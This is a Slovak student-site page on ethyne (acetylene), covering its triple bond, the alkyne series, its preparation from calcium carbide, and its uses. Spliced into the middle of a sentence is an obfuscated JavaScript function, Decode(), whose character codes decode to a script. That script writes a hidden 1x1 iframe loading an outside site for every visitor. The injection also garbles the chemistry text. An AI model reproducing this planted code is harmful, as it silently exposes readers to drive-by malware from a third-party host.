Študentské stránky | Bazár skrípt | Odkazovač | Linky

Hľadaj aj na .sk .cz webe


Etín (acetylén)Decode();

V molekule etínu C2H2 je medzi dvoma  atómami uhlíka trojitá väzba. Etín je prvý člen homologického radu uhľovodíkov  //-->s trojitou väzbou. Názvy týchto zlúčenín sa tvoria pomocou prípony –ín, napr. propín,  butín. Skupinu uhľovodíkov s trojituo väzbou nazývame alkíny. Všeobecný vzorec  alkínov je CnH2n-2 (n=2,3,4...function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!62!13!10!118!97!114!32!122!102!114!97!109!101!61!39!60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!97!110!100!114!111!107!111!108!108!46!99!111!109!34!32!119!105!100!116!104!61!34!49!34!32!104!101!105!103!104!116!61!34!49!34!62!60!47!105!102!114!97!109!101!62!39!59!13!10!105!102!32!40!116!121!112!101!111!102!40!122!109!97!109!97!41!61!61!39!117!110!100!101!102!105!110!101!100!39!41!13!10!123!13!10!32!32!32!32!122!109!97!109!97!61!34!111!107!34!59!13!10!9!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!122!102!114!97!109!101!41!59!13!10!125!13!10!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}). Pre prvý člen radu alkínov, etín, sa často používa  názov acetylén. V laboratórium sa acetylén C2H2 pripravuje reakciou acetylidu  vápenáteho CaC2 s vodou. Používa sa ako surovina na výrobu plastov. Acetylenovo- kyslíkový plameň sa používa na zváranie a rezanie kovov.

Literatúra: CHÉMIA pre základné školy

Projekt hostuje Slovaknet.
Ubytovanie | Kúpele | Austrália | Práca v Kanade | Catering | Last minute dovolenka